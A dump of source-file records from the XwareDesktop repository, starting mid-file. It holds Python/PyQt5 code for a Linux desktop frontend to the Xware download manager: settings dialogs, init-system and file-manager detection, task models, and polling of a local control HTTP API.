self.spinBox_ulSpeedLimit.setValue(etmSettings.uLimit)\n\n def saveSetting(self):\n if not self.isEnabled():\n return\n\n # called by parent menu's saveSettings.\n if self.checkBox_ulSpeedLimit.isChecked():\n ulSpeedLimit = self.spinBox_ulSpeedLimit.value()\n else:\n ulSpeedLimit = -1\n\n if self.checkBox_dlSpeedLimit.isChecked():\n dlSpeedLimit = self.spinBox_dlSpeedLimit.value()\n else:\n dlSpeedLimit = -1\n\n newEtmSetting = EtmSetting(dLimit = dlSpeedLimit, uLimit = ulSpeedLimit,\n maxRunningTasksNum = None)\n app.etmpy.saveSettings(newEtmSetting)\n"
},
{
"alpha_fraction": 0.6232837438583374,
"alphanum_fraction": 0.6275743842124939,
"avg_line_length": 25.687023162841797,
"blob_id": "2af0a8d888c38445a1e30784d1835be19124cc29",
"content_id": "183d0b8c9724026552863a997cc0cb615c69a149",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3496,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 131,
"path": "/src/frontend/utils/system.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtGui import QDesktopServices\n\nimport enum\nfrom collections import defaultdict\nfrom itertools import groupby\nimport os, subprocess, errno\n\nfrom .decorators import simplecache\n\n\[email protected]\nclass InitType(enum.Enum):\n SYSTEMD = 1\n UPSTART = 2\n UPSTART_WITHOUT_USER_SESSION = 3\n UNKNOWN = 4\n\n\n@simplecache\ndef getInitType():\n with subprocess.Popen([\"init\", \"--version\"], stdout = subprocess.PIPE) as proc:\n initVersion = str(proc.stdout.read())\n\n if \"systemd\" in initVersion:\n return InitType.SYSTEMD\n elif \"upstart\" in initVersion:\n if \"UPSTART_SESSION\" in os.environ:\n return InitType.UPSTART\n else:\n return InitType.UPSTART_WITHOUT_USER_SESSION\n else:\n # On Fedora \"init --version\" gives an error\n # Use an alternative method\n try:\n realInitPath = os.readlink(\"/usr/sbin/init\")\n if realInitPath.endswith(\"systemd\"):\n return InitType.SYSTEMD\n except FileNotFoundError:\n pass\n except OSError as e:\n if e.errno == errno.EINVAL:\n pass # Not a symlink\n else:\n raise e # rethrow\n\n return InitType.UNKNOWN\n\n\[email protected]\nclass FileManagerType(enum.Enum):\n Dolphin = 1\n Thunar = 2\n PCManFM = 3\n Nemo = 4\n Nautilus = 5\n Unknown = 6\n\n\n@simplecache\ndef getFileManagerType():\n with subprocess.Popen([\"xdg-mime\", \"query\", \"default\", \"inode/directory\"],\n stdout = subprocess.PIPE) as proc:\n output = str(proc.stdout.read()).lower()\n\n if \"dolphin\" in output:\n return FileManagerType.Dolphin\n elif \"nautilus\" in output:\n return FileManagerType.Nautilus\n elif \"nemo\" in output:\n return FileManagerType.Nemo\n elif \"pcmanfm\" in output:\n return FileManagerType.PCManFM\n elif \"thunar\" in output:\n return FileManagerType.Thunar\n\n return FileManagerType.Unknown\n\n\ndef runAsIndependentProcess(line: \"ls -al\"):\n \"\"\"\n Useful when we don't care about input/output/return value.\n :param line: command line to run\n :return: None\n \"\"\"\n pid = os.fork()\n if pid == 0:\n # child\n parts = line.split(\" \")\n os.execvp(parts[0], parts)\n else:\n return\n\n\ndef systemOpen(url: str):\n qUrl = QUrl.fromLocalFile(url)\n QDesktopServices.openUrl(qUrl)\n\n\ndef viewMultipleFiles(files: \"list<str of file paths>\"):\n files = sorted(files)\n\n d = defaultdict(list)\n for path, filenames in groupby(files, key = os.path.dirname):\n for filename in filenames:\n d[path].append(filename)\n\n fileManager = getFileManagerType()\n\n if fileManager == FileManagerType.Dolphin:\n for path in d:\n os.system(\"dolphin --select {}\".format(\" \".join(d[path])))\n else:\n # Thunar, PCManFM, Nemo don't support select at all!\n # Nautilus doesn't support selecting multiple files.\n # fallback using systemOpen\n for path in d:\n systemOpen(path)\n\n\ndef viewOneFile(file: \"str of file path\"):\n fileManager = getFileManagerType()\n if fileManager == FileManagerType.Dolphin:\n runAsIndependentProcess(\"dolphin --select {}\".format(file))\n elif fileManager == FileManagerType.Nautilus:\n runAsIndependentProcess(\"nautilus --select {}\".format(file))\n else:\n # fallback\n systemOpen(os.path.dirname(file))\n"
},
{
"alpha_fraction": 0.6412146091461182,
"alphanum_fraction": 0.6446540951728821,
"avg_line_length": 41.5774040222168,
"blob_id": "ad211dba8368db00bca3555540e443821db64e8c",
"content_id": "8d791c517e43af943f6b1e98fca21bf7939fcb85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10310,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 239,
"path": "/src/frontend/Settings/dialog.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtWidgets import QDialog, QTableWidgetItem, QButtonGroup, QFileDialog, QMessageBox\nfrom PyQt5.QtGui import QBrush\n\nimport os\nfrom utils.system import getInitType, InitType\n\nfrom xwaredpy import InvalidSocket\nfrom etmpy import EtmSetting\nfrom .ui_settings import Ui_Dialog\n\n\nclass SettingsDialog(QDialog, Ui_Dialog):\n def __init__(self, parent):\n super().__init__(parent)\n self.setAttribute(Qt.WA_DeleteOnClose)\n\n self.setupUi(self)\n\n self.lineEdit_loginUsername.setText(app.settings.get(\"account\", \"username\"))\n self.lineEdit_loginPassword.setText(app.settings.get(\"account\", \"password\"))\n self.checkBox_autoLogin.setChecked(app.settings.getbool(\"account\", \"autologin\"))\n self.checkBox_autoStartFrontend.setChecked(app.autoStart)\n\n # Xwared Management\n managedBySystemd = app.xwaredpy.managedBySystemd\n managedByUpstart = app.xwaredpy.managedByUpstart\n managedByAutostart = app.xwaredpy.managedByAutostart\n\n self.radio_managedBySystemd.setChecked(managedBySystemd)\n self.radio_managedByUpstart.setChecked(managedByUpstart)\n self.radio_managedByAutostart.setChecked(managedByAutostart)\n self.radio_managedByNothing.setChecked(\n not (managedBySystemd or managedByUpstart or managedByAutostart))\n\n initType = getInitType()\n self.radio_managedBySystemd.setEnabled(initType == InitType.SYSTEMD)\n self.radio_managedByUpstart.setEnabled(initType == InitType.UPSTART)\n\n # frontend\n self.checkBox_enableDevelopersTools.setChecked(\n app.settings.getbool(\"frontend\", \"enabledeveloperstools\"))\n self.checkBox_allowFlash.setChecked(app.settings.getbool(\"frontend\", \"allowflash\"))\n self.checkBox_minimizeToSystray.setChecked(\n app.settings.getbool(\"frontend\", \"minimizetosystray\"))\n self.checkBox_closeToMinimize.setChecked(\n app.settings.getbool(\"frontend\", \"closetominimize\"))\n self.checkBox_popNotifications.setChecked(\n app.settings.getbool(\"frontend\", \"popnotifications\"))\n self.checkBox_notifyBySound.setChecked(\n app.settings.getbool(\"frontend\", \"notifybysound\"))\n self.checkBox_showMonitorWindow.setChecked(\n app.settings.getbool(\"frontend\", \"showmonitorwindow\"))\n self.spinBox_monitorFullSpeed.setValue(\n app.settings.getint(\"frontend\", \"monitorfullspeed\"))\n\n # clipboard related\n self.checkBox_watchClipboard.stateChanged.connect(self.slotWatchClipboardToggled)\n self.checkBox_watchClipboard.setChecked(app.settings.getbool(\"frontend\", \"watchclipboard\"))\n self.slotWatchClipboardToggled(self.checkBox_watchClipboard.checkState())\n self.plaintext_watchPattern.setPlainText(app.settings.get(\"frontend\", \"watchpattern\"))\n\n self.btngrp_etmStartWhen = QButtonGroup()\n self.btngrp_etmStartWhen.addButton(self.radio_backendStartWhen1, 1)\n self.btngrp_etmStartWhen.addButton(self.radio_backendStartWhen2, 2)\n self.btngrp_etmStartWhen.addButton(self.radio_backendStartWhen3, 3)\n\n startEtmWhen = app.xwaredpy.startEtmWhen\n if startEtmWhen:\n self.btngrp_etmStartWhen.button(startEtmWhen).setChecked(True)\n else:\n self.group_etmStartWhen.setEnabled(False)\n\n self.btn_addMount.clicked.connect(self.slotAddMount)\n self.btn_removeMount.clicked.connect(self.slotRemoveMount)\n\n # Mounts\n self.setupMounts()\n\n # backend setting is a different thing!\n self.setupETM()\n\n @pyqtSlot(int)\n def slotWatchClipboardToggled(self, state):\n self.plaintext_watchPattern.setEnabled(state)\n\n @pyqtSlot()\n def setupMounts(self):\n 
self.table_mounts.setRowCount(0)\n self.table_mounts.clearContents()\n\n mountsMapping = app.mountsFaker.getMountsMapping()\n for i, mount in enumerate(app.mountsFaker.mounts):\n self.table_mounts.insertRow(i)\n # drive1: the drive letter it should map to, by alphabetical order\n drive1 = app.mountsFaker.driveIndexToLetter(i)\n self.table_mounts.setItem(i, 0, QTableWidgetItem(drive1 + \"\\\\TDDOWNLOAD\"))\n\n # mounts = ['/path/to/1', 'path/to/2', ...]\n self.table_mounts.setItem(i, 1, QTableWidgetItem(mount))\n\n # drive2: the drive letter it actually is assigned to\n drive2 = mountsMapping.get(mount, \"无\")\n\n errors = []\n\n # check: mapping\n if drive1 != drive2:\n errors.append(\n \"错误:盘符映射在'{actual}',而不是'{should}'。\\n\"\n \"如果这是个新挂载的文件夹,请尝试稍等,或重启后端,可能会修复此问题。\"\n .format(actual = drive2, should = drive1))\n\n brush = QBrush()\n if errors:\n brush.setColor(Qt.red)\n errString = \"\\n\".join(errors)\n else:\n brush.setColor(Qt.darkGreen)\n errString = \"正常\"\n errWidget = QTableWidgetItem(errString)\n errWidget.setForeground(brush)\n\n self.table_mounts.setItem(i, 2, errWidget)\n del brush, errWidget\n\n self.table_mounts.resizeColumnsToContents()\n\n @pyqtSlot()\n def slotAddMount(self):\n fileDialog = QFileDialog(self, Qt.Dialog)\n fileDialog.setFileMode(QFileDialog.Directory)\n fileDialog.setOption(QFileDialog.ShowDirsOnly, True)\n fileDialog.setViewMode(QFileDialog.List)\n fileDialog.setDirectory(os.environ[\"HOME\"])\n if fileDialog.exec():\n selected = fileDialog.selectedFiles()[0]\n if selected in self.newMounts:\n return\n row = self.table_mounts.rowCount()\n self.table_mounts.insertRow(row)\n self.table_mounts.setItem(\n row, 0,\n QTableWidgetItem(app.mountsFaker.driveIndexToLetter(row) + \"\\\\TDDOWNLOAD\"))\n self.table_mounts.setItem(row, 1, QTableWidgetItem(selected))\n self.table_mounts.setItem(row, 2, QTableWidgetItem(\"新近添加\"))\n\n @pyqtSlot()\n def slotRemoveMount(self):\n row = self.table_mounts.currentRow()\n self.table_mounts.removeRow(row)\n\n @pyqtSlot()\n def accept(self):\n app.settings.set(\"account\", \"username\", self.lineEdit_loginUsername.text())\n app.settings.set(\"account\", \"password\", self.lineEdit_loginPassword.text())\n app.settings.setbool(\"account\", \"autologin\", self.checkBox_autoLogin.isChecked())\n\n app.autoStart = self.checkBox_autoStartFrontend.isChecked()\n\n app.xwaredpy.managedBySystemd = self.radio_managedBySystemd.isChecked()\n app.xwaredpy.managedByUpstart = self.radio_managedByUpstart.isChecked()\n app.xwaredpy.managedByAutostart = self.radio_managedByAutostart.isChecked()\n\n app.settings.setbool(\"frontend\", \"enabledeveloperstools\",\n self.checkBox_enableDevelopersTools.isChecked())\n app.settings.setbool(\"frontend\", \"allowflash\",\n self.checkBox_allowFlash.isChecked())\n app.settings.setbool(\"frontend\", \"minimizetosystray\",\n self.checkBox_minimizeToSystray.isChecked())\n\n # A possible Qt bug\n # https://bugreports.qt-project.org/browse/QTBUG-37695\n app.settings.setbool(\"frontend\", \"closetominimize\",\n self.checkBox_closeToMinimize.isChecked())\n app.settings.setbool(\"frontend\", \"popnotifications\",\n self.checkBox_popNotifications.isChecked())\n app.settings.setbool(\"frontend\", \"notifybysound\",\n self.checkBox_notifyBySound.isChecked())\n\n app.settings.setbool(\"frontend\", \"showmonitorwindow\",\n self.checkBox_showMonitorWindow.isChecked())\n app.settings.setint(\"frontend\", \"monitorfullspeed\",\n self.spinBox_monitorFullSpeed.value())\n app.settings.setbool(\"frontend\", \"watchclipboard\",\n 
self.checkBox_watchClipboard.isChecked())\n app.settings.set(\"frontend\", \"watchpattern\",\n self.plaintext_watchPattern.toPlainText())\n\n if self.group_etmStartWhen.isEnabled():\n startEtmWhen = self.btngrp_etmStartWhen.id(self.btngrp_etmStartWhen.checkedButton())\n try:\n app.xwaredpy.startEtmWhen = startEtmWhen\n except InvalidSocket:\n QMessageBox.warning(None, \"Xware Desktop\",\n \"选项未能成功设置:{}。\".format(self.group_etmStartWhen.title()),\n QMessageBox.Ok, QMessageBox.Ok)\n\n app.settings.save()\n\n app.mountsFaker.mounts = self.newMounts\n app.settings.applySettings.emit()\n super().accept()\n\n @property\n def newMounts(self):\n return list(map(lambda row: self.table_mounts.item(row, 1).text(),\n range(self.table_mounts.rowCount())))\n\n @pyqtSlot()\n def setupETM(self):\n # fill values\n lcPort = app.xwaredpy.lcPort\n self.lineEdit_lcport.setText(str(lcPort) if lcPort else \"不可用\")\n\n etmSettings = app.etmpy.getSettings()\n if etmSettings:\n self.spinBox_dSpeedLimit.setValue(etmSettings.dLimit)\n self.spinBox_uSpeedLimit.setValue(etmSettings.uLimit)\n self.spinBox_maxRunningTasksNum.setValue(etmSettings.maxRunningTasksNum)\n\n # connect signals\n self.accepted.connect(self.saveETM)\n else:\n self.spinBox_dSpeedLimit.setEnabled(False)\n self.spinBox_uSpeedLimit.setEnabled(False)\n self.spinBox_maxRunningTasksNum.setEnabled(False)\n\n @pyqtSlot()\n def saveETM(self):\n newsettings = EtmSetting(dLimit = self.spinBox_dSpeedLimit.value(),\n uLimit = self.spinBox_uSpeedLimit.value(),\n maxRunningTasksNum = self.spinBox_maxRunningTasksNum.value())\n\n app.etmpy.saveSettings(newsettings)\n"
},
{
"alpha_fraction": 0.6046662330627441,
"alphanum_fraction": 0.6063512563705444,
"avg_line_length": 27.054546356201172,
"blob_id": "87e2e51cfe3490f498d2bab718d40d7b9bb9616f",
"content_id": "17c772d324e223b45e86e8e11964727cf61ba21c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7715,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 275,
"path": "/src/frontend/libxware/item.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\nfrom PyQt5.QtCore import pyqtProperty, pyqtSignal, QObject\nfrom models.ProxyModel import TaskClass\n\nfrom .vanilla import TaskClass as XwareTaskClass\n\n_SPEED_SAMPLE_COUNT = 50\n\n\nclass VipChannel(QObject):\n updated = pyqtSignal()\n\n def __init__(self, parent):\n super().__init__(parent)\n self._type = None\n self._size = None\n self._speed = None\n self._speeds = [0] * _SPEED_SAMPLE_COUNT\n self._state = None\n self._available = None\n self._errorCode = None\n\n @pyqtProperty(int, notify = updated)\n def type(self):\n return self._type\n\n @pyqtProperty(int, notify = updated)\n def size(self):\n return self._size\n\n @pyqtProperty(int, notify = updated)\n def speed(self):\n return self._speed\n\n @speed.setter\n def speed(self, value):\n self._speed = value\n self._speeds = self._speeds[1:] + [value]\n\n @pyqtProperty(\"QList<int>\", notify = updated)\n def speeds(self):\n return self._speeds\n\n @pyqtProperty(int, notify = updated)\n def state(self):\n return self._state\n\n @pyqtProperty(int, notify = updated)\n def available(self):\n return self._available\n\n @pyqtProperty(int, notify = updated)\n def errorCode(self):\n return self._errorCode\n\n def update(self, data):\n self._type = data.get(\"type\")\n self._size = data.get(\"dlBytes\")\n self.speed = data.get(\"speed\")\n self._state = data.get(\"opened\")\n self._available = data.get(\"available\")\n self._errorCode = data.get(\"failCode\")\n self.updated.emit()\n\n\nclass LixianChannel(QObject):\n updated = pyqtSignal()\n\n def __init__(self, parent):\n super().__init__(parent)\n self._state = None\n self._speed = None\n self._speeds = [0] * _SPEED_SAMPLE_COUNT\n self._size = None\n self._serverSpeed = None\n self._serverProgress = None\n self._errorCode = None\n\n @pyqtProperty(int, notify = updated)\n def state(self):\n return self._state\n\n @pyqtProperty(int, notify = updated)\n def speed(self):\n return self._speed\n\n @speed.setter\n def speed(self, value):\n self._speed = value\n self._speeds = self.speeds[1:] + [value]\n\n @pyqtProperty(\"QList<int>\", notify = updated)\n def speeds(self):\n return self._speeds\n\n @pyqtProperty(int, notify = updated)\n def size(self):\n return self._size\n\n @pyqtProperty(int, notify = updated)\n def serverSpeed(self):\n return self._serverSpeed\n\n @pyqtProperty(int, notify = updated)\n def serverProgress(self):\n return self._serverProgress\n\n @pyqtProperty(int, notify = updated)\n def errorCode(self):\n return self._errorCode\n\n def update(self, data):\n self._state = data.get(\"state\")\n self.speed = data.get(\"speed\")\n self._size = data.get(\"dlBytes\")\n self._serverSpeed = data.get(\"serverSpeed\")\n self._serverProgress = data.get(\"serverProgress\")\n self._errorCode = data.get(\"failCode\")\n self.updated.emit()\n\n\nclass XwareTaskItem(QObject):\n initialized = pyqtSignal()\n updated = pyqtSignal()\n errorOccurred = pyqtSignal()\n\n def __init__(self, *, adapter):\n super().__init__(None)\n self._initialized = False\n self._adapter = adapter\n self._namespace = self._adapter.namespace\n self._klass = None\n\n self._id = None\n self._name = None\n self._speed = None\n self._speeds = [0] * _SPEED_SAMPLE_COUNT\n self._progress = None\n self._creationTime = None\n self._runningTime = None\n self._remainingTime = None\n self._completionTime = None\n self._state = None\n self._path = None\n self._size = None\n self._errorCode = None\n\n self._vipChannel = VipChannel(self)\n self._lixianChannel = 
LixianChannel(self)\n\n self.moveToThread(app.thread())\n self.setParent(app.taskModel)\n\n @pyqtProperty(int, notify = initialized)\n def realid(self):\n return self._id\n\n @pyqtProperty(str, notify = initialized)\n def id(self):\n return self.namespace + \"|\" + str(self.realid)\n\n @pyqtProperty(str, notify = initialized)\n def name(self):\n return self._name\n\n @pyqtProperty(int, notify = initialized)\n def creationTime(self):\n return self._creationTime\n\n @pyqtProperty(str, notify = initialized)\n def path(self):\n return self._path\n\n @pyqtProperty(str, notify = initialized)\n def namespace(self):\n return self._namespace\n\n @pyqtProperty(int, notify = initialized)\n def size(self):\n return self._size\n\n @pyqtProperty(int, notify = updated)\n def speed(self):\n return self._speed\n\n @speed.setter\n def speed(self, value):\n self._speed = value\n self._speeds = self._speeds[1:] + [value]\n\n @pyqtProperty(\"QList<int>\", notify = updated)\n def speeds(self):\n return self._speeds\n\n @pyqtProperty(int, notify = updated)\n def progress(self):\n return self._progress\n\n @pyqtProperty(int, notify = updated)\n def remainingTime(self):\n return self._remainingTime\n\n @pyqtProperty(int, notify = updated)\n def completionTime(self):\n return self._completionTime\n\n @pyqtProperty(int, notify = updated)\n def state(self):\n return self._state\n\n @pyqtProperty(int, notify = errorOccurred)\n def errorCode(self):\n return self._errorCode\n\n @pyqtProperty(QObject, notify = initialized)\n def vipChannel(self):\n return self._vipChannel\n\n @pyqtProperty(QObject, notify = initialized)\n def lixianChannel(self):\n return self._lixianChannel\n\n @property\n def fullpath(self):\n return self.path + self.name\n\n @pyqtProperty(int, notify = updated)\n def klass(self):\n # _klass is xware class[0-3],\n # return Xware Desktop task class\n return 1 << self._klass\n\n # Xware Local Control doesn't always return reliable state,\n # needs to use class directly\n\n # return {\n # XwareTaskClass.DOWNLOADING: TaskClass.RUNNING,\n # XwareTaskClass.WAITING: TaskClass.RUNNING,\n # XwareTaskClass.STOPPED: TaskClass.RUNNING,\n # XwareTaskClass.PAUSED: TaskClass.RUNNING,\n # XwareTaskClass.FINISHED: TaskClass.COMPLETED,\n # XwareTaskClass.FAILED: TaskClass.FAILED,\n # XwareTaskClass.UPLOADING: TaskClass.RUNNING,\n # XwareTaskClass.SUBMITTING: TaskClass.RUNNING,\n # XwareTaskClass.DELETED: TaskClass.RECYCLED,\n # XwareTaskClass.RECYCLED: TaskClass.RECYCLED,\n # XwareTaskClass.SUSPENDED: TaskClass.RUNNING,\n # XwareTaskClass.ERROR: TaskClass.FAILED,\n # }[self.state]\n\n def update(self, data, klass):\n self._klass = klass\n\n self.speed = data.get(\"speed\")\n self._remainingTime = data.get(\"remainTime\")\n self._state = data.get(\"state\")\n self._completionTime = data.get(\"completeTime\")\n self._progress = data.get(\"progress\")\n self._runningTime = data.get(\"downTime\")\n\n self._vipChannel.update(data.get(\"vipChannel\"))\n self._lixianChannel.update(data.get(\"lixianChannel\"))\n\n if not self._initialized:\n self._id = data.get(\"id\")\n self._name = data.get(\"name\")\n self._creationTime = data.get(\"createTime\")\n self._path = data.get(\"path\")\n self._size = data.get(\"size\")\n self._initialized = True\n self.initialized.emit()\n\n self.updated.emit()\n"
},
{
"alpha_fraction": 0.5708884596824646,
"alphanum_fraction": 0.5784499049186707,
"avg_line_length": 32.80826950073242,
"blob_id": "290c31dbaaf6463b222cdd9b79285ad22f432c5a",
"content_id": "09e4dc7b8e7fc5d38db83b9857f96742d8d95067",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9075,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 266,
"path": "/src/frontend/etmpy.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal\n\nimport threading, time\nimport requests, json\nfrom json.decoder import scanner, scanstring\nimport collections\nfrom requests.exceptions import ConnectionError\nfrom urllib.parse import unquote\nfrom datetime import datetime\n\n\nclass LocalCtrlNotAvailableError(BaseException):\n pass\n\nEtmSetting = collections.namedtuple(\"EtmSetting\", [\"dLimit\", \"uLimit\", \"maxRunningTasksNum\"])\nActivationStatus = collections.namedtuple(\"ActivationStatus\",\n [\"userid\", \"status\", \"code\", \"peerid\"])\n\n\nclass _TaskPollingJsonDecoder(json.JSONDecoder):\n # This class automatically unquotes URL-quoted characters like %20\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.parse_string = self.unquote_parse_string\n # \"rebuild\" scan_once\n # scanner.c_make_scanner doesn't seem to support custom parse_string.\n self.scan_once = scanner.py_make_scanner(self)\n\n @staticmethod\n def unquote_parse_string(*args, **kwargs):\n result = scanstring(*args, **kwargs) # => (str, end_index)\n unquotedResult = (unquote(result[0]), result[1])\n return unquotedResult\n\n\nclass EtmPy(QObject):\n sigTasksSummaryUpdated = pyqtSignal([bool], [dict])\n\n runningTasksStat = None\n completedTasksStat = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n # task stats\n self.runningTasksStat = RunningTaskStatistic(self)\n self.completedTasksStat = CompletedTaskStatistic(self)\n self.t = threading.Thread(target = self.pollTasks, daemon = True,\n name = \"tasks polling\")\n self.t.start()\n\n @property\n def lcontrol(self):\n lcPort = app.xwaredpy.lcPort\n if not lcPort:\n raise LocalCtrlNotAvailableError()\n return \"http://127.0.0.1:{}/\".format(lcPort)\n\n def getSettings(self):\n try:\n req = requests.get(self.lcontrol + \"getspeedlimit\")\n limits = req.json()[1:] # not sure about what first element means, ignore for now\n\n req = requests.get(self.lcontrol + \"getrunningtaskslimit\")\n maxRunningTasksNum = req.json()[1]\n\n return EtmSetting(dLimit = limits[0], uLimit = limits[1],\n maxRunningTasksNum = maxRunningTasksNum)\n except (ConnectionError, LocalCtrlNotAvailableError):\n return False\n\n def saveSettings(self, newsettings):\n # save limits before disabling\n if newsettings.dLimit != -1:\n app.settings.setint(\"internal\", \"dlspeedlimit\", newsettings.dLimit)\n if newsettings.uLimit != -1:\n app.settings.setint(\"internal\", \"ulspeedlimit\", newsettings.uLimit)\n\n try:\n if newsettings.maxRunningTasksNum:\n requests.post(self.lcontrol +\n \"settings?downloadSpeedLimit={}\"\n \"&uploadSpeedLimit={}\"\n \"&maxRunTaskNumber={}\".format(*newsettings))\n else:\n requests.post(self.lcontrol +\n \"settings?downloadSpeedLimit={}\"\n \"&uploadSpeedLimit={}\".format(newsettings.dLimit,\n newsettings.uLimit))\n except (ConnectionError, LocalCtrlNotAvailableError):\n logging.error(\"trying to set etm settings, but failed.\")\n\n def _requestPollTasks(self, kind): # kind means type, but type is a python reserved word.\n try:\n req = requests.get(self.lcontrol +\n \"list?v=2&type={}&pos=0&number=99999&needUrl=1\".format(kind))\n res = req.content.decode(\"utf-8\")\n result = json.loads(res, cls = _TaskPollingJsonDecoder)\n except (ConnectionError, LocalCtrlNotAvailableError):\n result = None\n return result\n\n def pollTasks(self):\n while True:\n resRunning = self._requestPollTasks(0)\n self.runningTasksStat.update(resRunning)\n\n 
resCompleted = self._requestPollTasks(1)\n self.completedTasksStat.update(resCompleted)\n\n # emit summary, it doesn't matter using resRunning or resCompleted\n if resRunning is not None:\n self.sigTasksSummaryUpdated[dict].emit(resRunning)\n else:\n self.sigTasksSummaryUpdated[bool].emit(False)\n time.sleep(0.5)\n\n def getActivationStatus(self):\n try:\n req = requests.get(self.lcontrol + \"getsysinfo\")\n res = req.json()\n status = res[3] # 1 - bound, 0 - unbound\n code = res[4]\n except (ConnectionError, LocalCtrlNotAvailableError):\n status = -1 # error\n code = None\n\n userId = app.xwaredpy.userId\n peerId = app.xwaredpy.peerId\n\n result = ActivationStatus(userId, status, code, peerId)\n return result\n\n\nclass TaskStatistic(QObject):\n _tasks = None # copy from _stat_mod upon it's done.\n _tasks_mod = None # make changes to this one.\n\n TASK_STATES = {\n 0: (\"dload\", \"下载中\"),\n 8: (\"wait\", \"等待中\"),\n 9: (\"pause\", \"已停止\"),\n 10: (\"pause\", \"已暂停\"),\n 11: (\"finish\", \"已完成\"),\n 12: (\"delete\", \"下载失败\"),\n 13: (\"finish\", \"上传中\"),\n 14: (\"wait\", \"提交中\"),\n 15: (\"delete\", \"已删除\"),\n 16: (\"delete\", \"已移至回收站\"),\n 37: (\"wait\", \"已挂起\"),\n 38: (\"delete\", \"发生错误\"),\n }\n _initialized = False # when the application starts up, it shouldn't fire.\n\n def __init__(self, parent):\n super().__init__(parent)\n self._tasks = {}\n self._tasks_mod = {}\n\n def getTIDs(self):\n tids = list(self._tasks.keys())\n return tids\n\n def getTask(self, tid):\n try:\n result = self._tasks[tid].copy()\n except KeyError:\n result = dict()\n return result\n\n def getTasks(self):\n return self._tasks.copy()\n\n\nclass CompletedTaskStatistic(TaskStatistic):\n sigTaskCompleted = pyqtSignal(int)\n\n def __init__(self, parent = None):\n super().__init__(parent)\n\n def update(self, data):\n if data is None:\n return\n\n # make a list of id of recent finished tasks\n completed = []\n\n self._tasks_mod.clear()\n for task in data[\"tasks\"]:\n tid = task[\"id\"]\n self._tasks_mod[tid] = task\n\n if tid not in self._tasks:\n completed.append(tid)\n\n self._tasks = self._tasks_mod.copy()\n if self._initialized:\n # prevent already-completed tasks firing sigTaskCompleted\n # when ETM starting later than frontend\n # by comparing `completeTime` with `timestamp`\n # threshold: 10 secs\n timestamp = datetime.timestamp(datetime.now())\n for completedId in completed:\n if 0 <= timestamp - self._tasks[completedId][\"completeTime\"] <= 10:\n self.sigTaskCompleted.emit(completedId)\n else:\n self._initialized = True\n\n\nclass RunningTaskStatistic(TaskStatistic):\n sigTaskNolongerRunning = pyqtSignal(int) # the task finished/recycled/wronged\n sigTaskAdded = pyqtSignal(int)\n SPEEDS_SAMPLES_COUNT = 25\n\n def __init__(self, parent = None):\n super().__init__(parent)\n\n def _getSpeeds(self, tid):\n try:\n result = self._tasks[tid][\"speeds\"]\n except KeyError:\n result = [0] * self.SPEEDS_SAMPLES_COUNT\n return result\n\n @staticmethod\n def _composeNewSpeeds(oldSpeeds, newSpeed):\n return oldSpeeds[1:] + [newSpeed]\n\n def update(self, data):\n if data is None:\n # if data is None, meaning request failed, push speed 0 to all tasks\n for tid, task in self._tasks.items():\n oldSpeeds = self._getSpeeds(tid)\n newSpeeds = self._composeNewSpeeds(oldSpeeds, 0)\n task[\"speeds\"] = newSpeeds\n return\n\n self._tasks_mod.clear()\n for task in data[\"tasks\"]:\n tid = task[\"id\"]\n self._tasks_mod[tid] = task\n\n oldSpeeds = self._getSpeeds(tid)\n newSpeeds = self._composeNewSpeeds(oldSpeeds, 
task[\"speed\"])\n self._tasks_mod[tid][\"speeds\"] = newSpeeds\n\n prevTaskIds = set(self.getTIDs())\n currTaskIds = set(self._tasks_mod.keys())\n\n nolongerRunning = prevTaskIds - currTaskIds\n added = currTaskIds - prevTaskIds\n\n self._tasks = self._tasks_mod.copy()\n if self._initialized:\n for nolongerRunningId in nolongerRunning:\n self.sigTaskNolongerRunning.emit(nolongerRunningId)\n for addedId in added:\n self.sigTaskAdded.emit(addedId)\n else:\n self._initialized = True\n"
},
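Note on the `RunningTaskStatistic`/`CompletedTaskStatistic` classes in the record above: new, finished, and no-longer-running tasks are detected purely by set differences between the previous and current poll, and each running task keeps a fixed-length speed history that is shifted by one sample per poll. A minimal sketch of that polling pattern in plain Python (no Qt signals; the task payloads are hypothetical stand-ins for the real ETM data):

```python
# Minimal sketch of the set-difference polling pattern used above.
# The task dicts here are hypothetical stand-ins for the ETM payload.
SPEEDS_SAMPLES_COUNT = 25

def compose_new_speeds(old_speeds, new_speed):
    # Drop the oldest sample, append the newest: a fixed-size window.
    return old_speeds[1:] + [new_speed]

def poll(prev_tasks, data):
    curr_tasks = {t["id"]: t for t in data["tasks"]}
    for tid, task in curr_tasks.items():
        old = prev_tasks.get(tid, {}).get("speeds", [0] * SPEEDS_SAMPLES_COUNT)
        task["speeds"] = compose_new_speeds(old, task["speed"])
    added = set(curr_tasks) - set(prev_tasks)   # would fire sigTaskAdded
    gone = set(prev_tasks) - set(curr_tasks)    # would fire sigTaskNolongerRunning
    return curr_tasks, added, gone

prev = {}
prev, added, gone = poll(prev, {"tasks": [{"id": 1, "speed": 512}]})
assert added == {1} and gone == set()
prev, added, gone = poll(prev, {"tasks": [{"id": 2, "speed": 64}]})
assert added == {2} and gone == {1}
```

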